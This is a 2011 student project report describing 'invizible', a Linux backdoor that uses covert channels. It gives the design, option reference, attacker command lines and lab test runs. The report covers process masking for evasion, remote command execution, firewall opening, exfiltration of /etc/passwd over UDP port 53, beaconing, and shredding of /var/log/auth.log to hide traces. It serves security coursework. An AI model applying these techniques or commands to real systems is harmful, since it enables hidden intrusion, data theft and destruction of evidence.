BCIT COMP 8505 Final Project Covert Channel Exfiltration by Wesley Kenzie, June 2011

BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due
Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ This project is a design and implementation of a Linux-based covert channel exfiltration application code-named invizible. The application is presumed to be installed by some means on a remote computer, which is referred to in this report as the compromised machine. It is also presumed that the application is able to be automatically executed, and automatically re-launched upon each and every re-boot of the compromised machine. It is expected to be running substantially all of the time. The primary purpose of the application is to evade detection, and to allow remote control and remote access by an attacker running a copy of the application on a local machine she has physical access to. The attacker will have access to, and control of, a number of features in the application, including the covert exfiltration of any arbitrary file on the compromised machine back to the attacker over the public Internet, or over a private subnet. The application has been made available by the author as an open source project [1] in recognition and in appreciation of the significant open source software it makes use of and builds upon. 1. Introduction ......................................................................................... 2. Analysis and Methodology .................................................................... 3. Pseudo-code Design .............................................................................. page 2 page 5 page 9
4. Program Defaults and Options ............................................................... page 14 5. Test Results and Examples .................................................................... 6. Known Weaknesses and Recommended Further Work .......................... 7. Summary and Conclusions .................................................................... Appendix .................................................................................................. Bibliography ............................................................................................. Credits ...................................................................................................... page 18 page 35 page 36 page 37 page 38 page 39
______________________________________________________________________________ Copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved. Page 1 of 39
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ 1. Introduction This project is a design and implementation of a Linux-based covert channel exfiltration application code-named invizible. The application is presumed to be installed by some means on a remote computer, which is referred to in this report as the compromised machine. It is also presumed that the application is able to be automatically executed, and automatically re-launched upon each and every re-boot of the compromised machine. It is expected to be running substantially all of the time. The primary purpose of the application is to evade detection, and to allow remote control and remote access by an attacker running a copy of the application on a local machine. The attacker will have access to a number of related application features, including the covert exfiltration of any arbitrary file on the compromised machine back to the attacker over the public Internet. In order to evade detection on the compromised machine, the application masks its process name on start-up to match a randomly selected process that is already running at that moment in time. It also removes all command-line parameters from its process list on start-up, does not post to a log file by default, and uses no configuration file so as to keep its footprint as small as possible. In order to avoid triggering any intrusion detection systems, the application uses only the UDP protocol by default, sends packets to only random or well-used ports, and utilizes no known signatures for its packets. When the application starts up on the compromised machine, it automatically goes into listening mode, waiting for specially crafted incoming packets to arrive. The composition and design of these packets has been based on the open source fwknop[5] project. By default, the application sniffs for these packets arriving at any random port between 10000 and 65535, and using the UDP[2] protocol. By using the libpcap[3][4] facilities bundled with Linux, this detection of incoming packets by the application occurs separately from any firewall settings on the compromised machine. It also means the application does not require, or use, any open ports on the compromised machine. Once an incoming packet is detected, it must first be decrypted, then validated against an embedded cryptographic hash, and finally deconstructed to determine its intended purpose. Decryption is required because the packet is encrypted with the Rijndael[6] algorithm using a shared passphrase before it is sent out from the attackers local machine. A 24- or 25-character passphrase is built into all copies of the application that have the same major version number, but a reset password packet sent at any time from the attackers local machine can change this default password to anything the attacker wishes. These reset password packets allow the attacker to ensure that no one else can control the compromised machine through the application. Assuming that an incoming packet has been successfully decrypted, its cryptographic hash is then calculated, and compared to the hash embedded in the packet to ensure the integrity of the packet data. The default cryptographic hash algorithm used for the packets is SHA-256[7]. Deconstruction of the incoming packet after it has been decrypted and its integrity verified allows the compromised machine to learn what it is expected to do, as well as the IP address of the ______________________________________________________________________________ Copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved. Page 2 of 39
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ attackers local machine, the attackers login name, the timestamp the packet was sent, and a random number intended to reduce exposure to replay attacks[8]. The applications recognized packet types are as follows: (1) (2) (3) (4) (5) (6) reset password execute command open firewall inotify[9] watch transfer file wipe program
Each of these packet types are discussed in more detail below: (1) The reset password packet embeds a new password that the compromised machines application is to use for decryption of all subsequent incoming packets. This can be sent multiple times if the attacker wishes to change the password again. If the new password is lost by the attacker, then no further access to the compromised machine would be available until the application is launched again, at which time it would typically reset its password again to its default password. (2) The execute command packet embeds a command or series of commands to be executed via a system/shell on the compromised machine. If no specific command is specified, the default command sent to the compromised machine is defined to be date > /tmp/m; uname a >> /tmp/m; lsof nP | grep LISTEN >> /tmp/m; cat /proc/net/arp >> /tmp/m; cat /proc/net/route >> /tmp.m; ifconfig >> /tmp/m; df T >> /tmp/m which effectively provides the attacker with a significant amount of information about the compromised machine in a single file /tmp/m. (3) The open firewall packet embeds instructions to be passed by the application to the firewall that is assumed to be running on the compromised machine. The firewall is assumed to be iptables, and it is assumed that a port/protocol combination that is normally closed to outside access should be opened for a temporary number of seconds before being automatically closed again. If no specific port/protocol/time is specified, the default sent to the compromised machine is for port 22, protocol TCP, to be opened for 15 seconds and then closed again. Within this 15 second interval, the attacker would be able to circumvent the firewall in order to establish a connection to port 22 (which is typically running an ssh service) and so long as that connection was maintained the firewall could be expected to leave it alone since it would fall into the category of established connections that modern firewalls are typically configured to not interfere with. (4) The inotify watch packet embeds instructions to be passed by the application to the inotify facility that is assumed to be running on the compromised machine. This requires a Linux version 2.6.25 or greater. If no specific file or directory is specified, the default sent to the compromised machine is for the /var/log directory to be watched for up to 100 file changes or for up to 1 hour, whichever comes first, with all file changes logged to /tmp/i.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ (5) The transfer file packet embeds the name of an existing file on the compromised machine to be sent back to the attackers local machine, and optionally can instruct the compromised machine to erase/wipe the file after the transfer is complete. This file transfer is accomplished by way of 128-byte encrypted packets sent at randomly spaced intervals using the UDP protocol with a destination port 53 on the attackers local machine. These encrypted packets sent from the compromised machine are constructed in the same manner as packets sent out from the attackers local machine, other than the specified files contents are embedded in 128-byte chunks rather than instructions embedded for execution. The attackers local machine makes use of libpcap to listen on port 53 for these incoming packets - immediately after sending out this packet to the compromised machine - and after decrypting and verifying each packet, writes it to disk in a temporary file /tmp/received. The end of the file transfer is indicated by a final, speciallyformatted 128-byte packet and this is followed by one more encrypted packet which contains the size of the file that was just sent. (6) The wipe program packet instructs the compromised machine to wipe and remove the application program file from disk, as well as the applications standard log file at /var/log/invizible.log and any alternative log file that might be in use. After this the application terminates itself, and can no longer be run. In case the compromised machine is not reachable from the attackers local machine, the application is also designed to send out beacon packets at random intervals (between 1 minute and 1 hour) to advertise its presence. On average a beacon packet will be sent out every 29.5 minutes. The beacon packets are normally sent out over UDP to destination machines port 53, but can also be sent out over TCP to destination port 80. These beacon packets are encrypted and constructed in the same manner as all other packets, but have the compromised machines IP address and system information (uname a) embedded in each of them. No pre-determined IP address is currently hard-coded in the application to identify an attackers local machine and so these beacon packets are an attempt to assist an attacker in identifying the location of a compromised machine. The beacon packets are only sent out to private and public IP addresses on the same /24 subnet as the compromised machine, which allows the attacker the potential to learn of the compromised machines existence by getting access to any of the other machines on the same /24 subnet. With access to one of these other machines, the attacker can wait and listen for these beacon packets. The application developed by the author for this project is available as an open source project at [1] and the various commits made to this project over the last few https://launchpad.net/invizible months clearly document its development.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ 2. Analysis and Methodology Starting up the application on the compromised machine can simply be done as follows: ./invizible This puts the application into listening mode, waiting for incoming UDP packets on a random port between 10000 and 65535, expecting the incoming packets to be encrypted with the default password and using the SHA-256 cryptographic hash. The application also masks the process name to something random, sends out beacon messages at random intervals between 1 minute and 1 hour, and does not use a log file. It also makes a single HTTP/TCP connection to http://ippages.com/simple in order to determine its external public-facing IP address, spoofing its user-agent as DirectUpdate/4.6.2 so as to act like a Dynamic DNS updater. Exfiltration If the attacker has prior knowledge of the compromised machines location, and intends to exfiltrate a file from it to her own, she could enter the following on her local machine: ./invizible C S=123.123.123.123 --pkpass=newpwd42X# ./invizible C S=123.123.123.123 --pass=newpwd42X# --pktransfer=/etc/passwd It is assumed that the compromised machine is at IP address 123.123.123.123 in this case. The 1st of these commands resets the password on the compromised machine to newpwd42X#. The 2nd command instructs the compromised machine to begin transferring the /etc/passwd file back to the attackers local machine, in 128-byte chunks, at random intervals between 3 and 12 seconds, to the attackers port 53 using UDP. When done, the attacker will have a copy of the /etc/passwd file in /tmp/received. If this exfiltration attempt is targeted at a compromised machine on the same local subnet as the attackers local machine, then each of the 2 attacker commands should include a P option, to ensure that only private IP addresses are used as the destination for packets sent out from the compromised machine, not public IP addresses. If the attackers local machine is behind a NAT router/gateway, as most residential machines are, and the compromised machine is accessible over the public Internet, then the NAT router/gateway must be configured to forward incoming port 53 to port 53 on the private IP address of the attackers local machine in order for the packets sent out from the compromised machine are received at the attackers local machine. If the attacker wishes to erase the file from the compromised machine after it has been sent to the attacker, she could enter the following on her local machine: ./invizible C S=123.123.123.123 --pass=newpwd42X# --pktransfer=/var/log/syslog,remove ______________________________________________________________________________ Copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved. Page 5 of 39
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ Note, however that the compromised machine does not receive any confirmation from the attackers local machine that the exfiltrated file has been received. If the attacker wishes to have the application wipe itself off the compromised machine after a file has been sent, she could enter the following on her local machine: ./invizible C S=123.123.123.123 --pass=newpwd42X# \ --pktransfer=/home/wkenzie/confidential,wipe
Inotify If the attacker wishes to monitor and record file changes in a users home directory on the compromised machine, she could enter the following on her local machine: ./invizible C S=123.123.123.123 --pkpass=44229! ./invizible C S=123.123.123.123 --pass=44229! \ --pkinotify=/home/wkenzie,count=100,expiry=86400,log=/tmp/wkenzie.ilog This command instructs the compromised machine to initiate an inotify watch on the /home/wkenzie directory and record up to 100 file changes, or up to 1 days worth of file changes (86400 seconds), to a log file at /tmp/wkenzie.ilog. An automatic transfer of this /tmp/wkenzie.ilog file back to the attackers local machine would be a useful future enhancement to the application. The application does currently recognize an echo option as part of the -pkinotify= option, but it has proven to be insufficiently reliable. The echo option initiates an automatic transfer of the inotify log file back to the attackers local machine over a covert channel by way of DNS lookups/queries bounced off a DNS server with a spoofed source IP address that corresponds to the attackers local machine IP address. The attackers local machine is able to receive these bounced packets but re-assembly into a complete file has challenged the author thus far, and so this functionality has not been described in this report. If the attacker wishes to monitor and record up to 100 file changes, or up to 1 hours worth of file change, to the /var/log directory on the compromised machine, she could enter the following on her local machine: ./invizible C S=123.123.123.123 --pass=44229! --pk=inotify This would create a log file in /tmp/i that could be subsequently exfiltrated with the following command sent by the attacker 1 hour later: ./invizible C S=123.123.123.123 --pass=44229! --pktransfer=/tmp/i,remove
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ Firewall Access If the attacker wishes to open up a port through the firewall on the compromised machine, she could enter the following on her local machine: ./invizible C S=123.123.123.123 --pkpass=a%355K ./invizible C S=123.123.123.123 --pass=a%355K --pkaccess=TCP/22 This command instructs the compromised machine to open up port 22 for incoming TCP connections from the attackers local machine IP address for the next 15 seconds, after which port 22 is to be closed again. Within 15 seconds of sending this command, the attacker would need to enter the following on her local machine, presuming she has an ssh login account on the compromised machine: ssh 123.123.123.123 If the application itself included functionality to operate, for example, as an http or socks proxy, and it allowed access to this functionality through a TCP port such as port 9050, then the attacker could open up this port 9050 on the compromised machine with the following: ./invizible C S=123.123.123.123 --pass=a%355K --pkaccess=TCP/9050 --pktimeout=30 This would give her 30 seconds to then attempt to connect her browser to this proxy through port 9050 on the compromised machine.
Wipe If the attacker wishes to delete the application and its log files from the compromised machine, she could enter the following on her local machine: ./invizible C S=123.123.123.123 --pkpass=YJqr.7 ./invizible C S=123.123.123.123 --pass=YJqr.7 --pkwipe=self/7 This command instructs the compromised machine to wipe (using shred or dd) the application program file and log file with 7 passes of random data before deleting (using unlink) each of them. If the attacker wishes to erase a particular file from the compromised machines hard drive, she could enter the following on her local machine: ./invizible C S=123.123.123.123 --pass=YJqr.7 --pkwipe=/var/log/auth.log
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ Command Execution If the attacker wishes to execute an arbitrary command on the compromised machine, she could enter the following on her local machine: ./invizible C S=123.123.123.123 --pkpass=pIN#3 ./invizible C S=123.123.123.123 --pass=pIN#3 --pkcommand=ls l /home > /tmp/ls This command instructs the compromised machine to do a detailed file listing of the /home directory and put this listing in a /tmp/ls file. This file could be subsequently exfiltrated with the following command sent by the attacker a few moments later: ./invizible C S=123.123.123.123 --pass=pIN#3 --pktransfer=/tmp/ls,remove
Each of the packets sent out by the application, either to the compromised machine, or from the compromised machine, are encoded and encrypted as per the open source fwknop[5] project specification. Each packet is made up of the following, before being RIJNDAEL encrypted with the password being used at that time: 16 bytes of random data Local username Local timestamp Version number of fwknop specification Packet type (access, command, transfer, pass, inotify, wipe, beacon) Message content (as appropriate for the packet type) SHA256 Digest
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ 3. Pseudo-code Design main.c main() | |------------------ parms.c init_parms() | | |---------------------------|-------------- abort | |------------------ parms.c valparms() | | |---------------------------|-------------- abort | main.c run() -------------------------------------- abort | |------------------- parms.c cleanup_parms() | | |---------------------------| | end
main.c run() | |------------------- pkclient.c resolve_ip_http_inviz() | | |---------------------------------| | |------------------- invizible.c doinvizible() | | |---------------------------------| | end
invizible.c doinvizible() | |------------------------ hping/resolve.c resolve_addr() | | |---------------------------------------| | |------------------------ mypcap.c pcap_lookupdevspec() | | |---------------------------------------|------------- return | | | ______________________________________________________________________________ Copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved. Page 9 of 39
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ | |------------------------ libpcap pcap_lookupnet() | | |---------------------------------|------------ return | |------------------------ libpcap pcap_open_live() | | |---------------------------------|------------ return | |------------------------ libpcap pcap_setdirection() | | |---------------------------------| | |------------------------ libpcap pcap_compile() | | |---------------------------------|------------ return | |------------------------ libpcap pcap_setfilter() | | |---------------------------------|------------ return | |------------------------ hping/getifname.c get_if_name() | | |---------------------------------|------------ return | open raw socket --------------------------------------- return | |------------------------ hping/resolve.c resolve_addr() | | |---------------------------------------|------ return | is attacker and is sending port knocking packet? ------------yes---------------| | | no construct packet | | | calculate hash and | add to end of packet | | | get password from | user if not set | | | encrypt packet | with password | | | pkclient.c send_spa_packet_inviz() | | | | ______________________________________________________________________________ Copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved. Page 10 of 39
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ | | | is sent packet a | file transfer request? | | | |---no----|----yes--| | | | | | pkserver.c | | pcap_capture_inviz() | | | | re-launch as ---------------| | listener and | wait for incoming | packets ^ | | pkserver.c pcap_capture_inviz() | | | ended with terminate | or interrupt? | | | |------------no-------------------| yes | end
pkclient.c send_spa_packet_inviz() | construct ip header and tcp or udp header and tcp or udp data payload | use sendto() to send packet over raw socket | end
pkserver.c pcap_capture_inviz() | |----------------------- set_signal_handlers_inviz() | | |---------------------------------| | set beacon packet alarm() timer | ______________________________________________________________________________ Copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved. Page 11 of 39
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ | |--------------------------------------------------------------| | | libpcap pcap_dispatch() ----------- return | | | process_incoming_pkpacket() | | ^ error? --------yes------------------------------------------------| | | interrupt? --------yes-----------------------------------------------| | inotify watch initialized? ----------yes---------- do_inotify_watch() | | no re-launch as | listener and | wait for incoming | packets end
pkserver.c process_incoming_pkpacket() | preprocess_spa_data_inviz() --------no----------- return | decrypt packet -------------------no------------ return | get_spa_data_fields_inviz() --------no----------- return | is command packet? --------yes------- execute command -- return | no | is reset password packet? -----yes----- reset password -- return | no | is file transfer packet? ----yes------ is running on | compromised no machine? ----no-------------| | | | | yes listen for | | incoming | send file contents packets and | back to attacker save to disk | (covert channel) | | | | | | | ______________________________________________________________________________ Copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved. Page 12 of 39
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ | | return return | | | is inotify packet? --------yes---------------- initialize | inotify watch --- return no | is wipe packet? -----------yes----- wipe self? -----no--------| | | | no yes wipe specified | | file | wipe application | | | | return | die | is beacon packet? ----yes--------- record beacon message --- return | no | update firewall rules to allow access to specified port and protocol for attacker IP address for specified seconds | end
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ 4. Program Defaults and Options Command line options and defaults for the attackers local machine are as follows: -C -S=xyz --spoof=xyz --pkallow=xyz required; to indicate is client attackers side (as opposed to server compromised side) required; indicates IP address xyz of compromised machine to receive packets; compromised machine must be running application on this IP address in order to receive packets optional; indicates spoofed source IP address of packet sent to compromised machine optional; indicates allowed IP address inserted into firewall access packet sent to compromised machine; specified if IP address other than attackers local machine should be allowed access to the compromised machine optional; indicates external public IP address of attackers local machine that must be passed to compromised machine in firewall access packet; if xyz=auto then is automatically determined optional; defaults to DirectUpdate/4.6.2; specifies user-agent string to use when automatically determining external IP address optional; default is no testing; specify if packets not to be sent to compromised machine optional; no default; specify file name if copy of packets are to be saved to file xxxx on attackers local machine optional; no default; also recognized as --pass= or --password=; indicates password used for encryption of outgoing packets and decryption of incoming packets; if not supplied then user is prompted to enter it at run-time; must match password used on compromised machine optional; defaults to 0 which indicates it will be a random unprivileged source port number on outgoing packets; can be used to specify a particular source port number optional; defaults to --pkport=random; can specify any privileged or unprivileged port number (--pkport=n) or range of port numbers (-pkport=m-n); must be the same on both attackers local machine and compromised machine; this is essentially the backdoor port(s) on the compromised machine optional; if sending access request packet to compromised machine, this is the protocol and port number to be opened on the firewall optional; same as --pkaccess=tcp/22 or --pk=access optional; defaults to 15; indicates how many seconds to leave the pkaccess firewall port open before closing it again; can be specified from 1 to 3600
--external=xyz --ua=xxxx --testing --pksave=xxxx --pwd=xxxx
--srcport=n --pkport=n
--pkaccess=xxxx/n --pk=1 --pktimeout=n
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ --pkdigest=n optional; defaults to 3 which is SHA256; specifies digest method to use in port knocking packet construction and de-construction; 0 is MD5; 1 is SHA1; 2 is SHA128; 4 is SHA384; 5 is SHA512 --pkcommand=xxxx optional; if sending remote execution command packet, this is the remote command to be executed on the compromised machine --pk=2 optional; same as --pkcommand=date > /tmp/m; uname a >> /tmp/m; lsof nP | grep LISTEN >> /tmp/m; cat /proc/net/arp >> /tmp/m; cat /proc/net/route >> /tmp.m; ifconfig >> /tmp/m; df T >> /tmp/m or --pk=command --pktransfer=xxxx optional; if sending file transfer packet, this is the name of the xxxx file on the compromised machine to be transferred back to the attackers local machine --pk=3 optional; same as --pk=transfer --pkinotify=xxxx optional; if sending inotify packet, this is the xxxx directory or filename to be watched on the compromised machine --pk=4 optional; same as --pkinotify=watch=/var/log,log=/tmp/i or -pk=inotify --pkwipe=xxxx/n optional; if sending wipe packet, this is the xxxx filename to be wiped with n passes on the compromised machine --pk=6 optional; same as --pkwipe=self/7 or --pk=wipe --pkpass=xxxx optional; if sending reset password packet, this is the new xxxx password to be used until it is reset again or until the application restarts --pk=7 optional; same as --pk=pass --pkprivate optional; if sending port knocking packet to compromised machine on same local, private subnet, then specify this to send private IP address to compromised machine rather than public external IP address -P optional; same as --pkprivate Command line options and defaults applicable to both compromised machine and attackers local machine are as follows: --verbose -V -Q --ipv4=n --udp=n --tcp=n --raw=n --if=xxx --psmask=xxxx to indicate additional detailed messages are to be displayed same as --verbose to indicate quiet mode with little or no messages displayed defaults to 1; to specify not using IPv4 set to 0 defaults to 1; to specify not using UDP set to 0 defaults to 0; to specify using TCP set to 1; not fully tested at this time defaults to 1; to specify not using raw sockets set to 0 defaults to --if=any which is automatic determination of interface device; if specific interface required then identify it here defaults to --psmask=random; can specify any string up to 16 characters long to be used to mask running instance of the application
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ --pmode optional; default is to do packet sniffing not in promiscuous mode; specify if promiscuous mode sniffing to be done --pcapbuff=n optional; default is 1500 byte size for pcap sniffing buffer size; specify between 1 and 10240 if 1500 is not suitable --pcaptimeout=n optional; default is -1 meaning that pcap sniffing does not automatically timeout while waiting; specify between -1 and 86400 seconds if timeout required
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ Command line options and defaults for the compromised machine are as follows: --pk=n --firewallexe=xxxx --fwoutput --fwforwarding --fwsnat --pwd=xxxx optional; default is --pk=any; specifies the type of port knocking to listen for; see list of recognized --pk= options for attackers local machine optional; defaults to --firewallexe=/sbin/iptables; can specify any other firewall executable as required optional; default is to enable firewall OUTPUT access optional; default is to enable firewall FORWARDING access optional; default is to disable firewall SNAT access; specify if SNAT should be enabled optional; no default; also recognized as --pass= or --password=; indicates password used for decryption of incoming packets and encryption of outgoing packets; has built-in default value, and can be changed by incoming reset password packets from attackers local machine optional; defaults to --pkport=random; can specify any privileged or unprivileged port number (--pkport=n) or range of port numbers (-pkport=m-n); must be the same on both attackers local machine and compromised machine; this is essentially the backdoor port(s) on the compromised machine
--pkport=n
Command line options and defaults applicable to both compromised machine and attackers local machine are as follows: --verbose -V -Q --ipv4=n --udp=n --tcp=n --raw=n --if=xxx --psmask=xxxx --pmode --pcapbuff=n --pcaptimeout=n to indicate additional detailed messages are to be displayed same as --verbose to indicate quiet mode with little or no messages displayed defaults to 1; to specify not using IPv4 set to 0 defaults to 1; to specify not using UDP set to 0 defaults to 0; to specify using TCP set to 1; not fully tested at this time defaults to 1; to specify not using raw sockets set to 0 defaults to --if=any which is automatic determination of interface device; if specific interface required then identify it here defaults to --psmask=random; can specify any string up to 16 characters long to be used to mask running instance of the application optional; default is to do packet sniffing not in promiscuous mode; specify if promiscuous mode sniffing to be done optional; default is 1500 byte size for pcap sniffing buffer size; specify between 1 and 10240 if 1500 is not suitable optional; default is -1 meaning that pcap sniffing does not automatically timeout while waiting; specify between -1 and 86400 seconds if timeout required
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ 5. Test Results and Examples An exfiltration test run was done on June 21, 2011 as follows. This shows a reset password packet being sent from the attackers local machine at 192.168.0.193 to the compromised machine at 192.168.0.199. The new password is indicated as newpwd42X#. Note that tcpdump is running at the same time, recording activity on the eth0 interface into a file attacker1.pcap. On the compromised machine, tcpdump is also running, and recording activity into a corresponding file victim1.pcap. Note that the application process is number 18503, and is masked as [kswapd0]. Note that the L option is specified, indicating that all displayed activity is recorded to the the /var/log/invizible.log file. After sending this reset password packet, the application re-launches into listening mode, but this is manually interrupted with Ctrl-C by the author, and then a file transfer message is sent to the compromised machine, as shown below at 10:39:42.423755.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows the file transfer request for the /etc/passwd file from the compromised machine. The application re-launches into listening mode and then receives this file, in multiple incoming packets from the compromised machine at 192.168.0.199, starting at 10:39:43.137400. Each new packet arrives at a random interval between 3 and 12 seconds apart, which is the default behaviour for the application.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows completion of the incoming file transfer to /tmp/received at 10:41:33.14551 and confirmation of successful receipt of the entire 1943 byte file at 10:41:33.15255.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows the initial portion of the received /etc/passwd file from the compromised machine to /tmp/received on the attackers local machine.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows a directory listing of the /tmp file on the attackers local machine, confirming the file size and date/time stamp of the /tmp/received file exfiltrated from the compromised machine. It also shows the moving of the /tmp/received file to the etc_passwd.exfil file which is included on the accompanying DVD. The /var/log/invizible.log file is also moved to the attacker1.log file, which is also included on the accompanying DVD.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows a portion of the contents of the tcpdump capture file attacker1.pcap. Packet 26 is the reset password message sent to the compromised machine.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows packet 36 sent to the compromised machine as the file transfer message.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows packet 37 as the first of several packets arriving from the compromised machine, destinated to port 53 on the attackers local machine using the UDP protocol.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below from the attacker1.pcap file shows the last packet arriving from the compromised machine with the exfiltrated file contents in packet 92. Starting in packet 93 the attackers local machine is seen to be starting a session with one.ubuntu.com to do an automatic update check sequence.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows a portion of the contents of the tcpdump capture file victim1.pcap. Packet 18 is the reset password message arriving from the attackers machine at 192.168.0.193.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows packet 28 arriving at the compromised machine from the attackers machine with the file transfer request. The source and destination ports for all the packets shown here match exactly those contained in the attacker1.pcap file shown previously
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ Another exfiltration test run was done on June 21, 2011 at 12:3:40.411253 as follows. This shows a reset password packet being sent from the attackers local machine at 192.168.0.193 to the compromised machine at 192.168.0.199. The new password is indicated as what4. Tcpdump was set to run at the same time, recording activity on the eth0 interface into a file attacker2.pcap. On the compromised machine, tcpdump is also running, and recording activity into a corresponding file victim2.pcap. Note that the application process in this test is number 19398, and is masked as [migration/1] (with a spurious letter C showing after this). Note that the L option is again specified, indicating that all displayed activity is recorded to the the /var/log/invizible.log file. After sending this reset password packet, the application re-launches into listening mode, but this is manually interrupted with Ctrl-C by the author, and then a command execution message ls l /home > /tmp/ls is sent to the compromised machine, as shown below at 12:4:27.571436.
